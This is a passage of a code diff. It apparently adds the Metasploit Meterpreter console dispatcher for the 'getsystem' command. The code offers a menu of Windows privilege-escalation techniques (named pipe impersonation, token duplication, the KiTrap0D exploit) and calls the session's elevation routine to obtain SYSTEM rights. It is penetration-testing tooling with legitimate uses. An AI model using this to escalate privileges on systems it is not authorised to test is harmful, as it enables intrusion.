+										"Service - Named Pipe Impersonation (In Memory/Admin)",
+										"Service - Named Pipe Impersonation (Dropper/Admin)",
+										"Service - Token Duplication (In Memory/Admin)",
+										"Exploit - KiTrap0D (In Memory/User)"
+									]
+	#
+	# List of supported commands.
+	#
+	def commands
+		{
+			"getsystem" => "Attempt to elevate your privilege to that of local system."
+		}
+	end
+	#
+	# Name for this dispatcher.
+	#
+	def name
+		"Priv: Elevate"
+	end
+	#
+	# Attempt to elevate the meterpreter to that of local system.
+	#
+	def cmd_getsystem( *args )
+		technique = ELEVATE_TECHNIQUE_ANY
+		desc = ""
+		ELEVATE_TECHNIQUE_DESCRIPTION.each_index { |i| desc += "\n\t\t#{i} : #{ELEVATE_TECHNIQUE_DESCRIPTION[i]}" }
+		getsystem_opts = Rex::Parser::Arguments.new(
+			"-h" => [ false, "Help Banner." ],
+			"-t" => [ true, "The technique to use. (Default to \'#{technique}\')." + desc ]
+		)
+		getsystem_opts.parse(args) { | opt, idx, val |
+			case opt
+				when "-h"
+					print_line( "Usage: getsystem [options]\n" )
+					print_line( "Attempt to elevate your privilege to that of local system." )
+					print_line( getsystem_opts.usage )
+					return
+				when "-t"
+					technique = val.to_i
+			end
+		}
+		if( technique < 0 or technique >= ELEVATE_TECHNIQUE_DESCRIPTION.length )
+			print_error( "Technique '#{technique}' is out of range." );
+			return false;
+		end
+		result = client.priv.getsystem( technique )
+		# got system?
+		if result[0]
+			print_line( "...got system (via technique #{result[1]})." );
+		else
+			print_line( "...failed to get system." );
+		end
+		return result
+	end
+end
+end
+end
+end
+end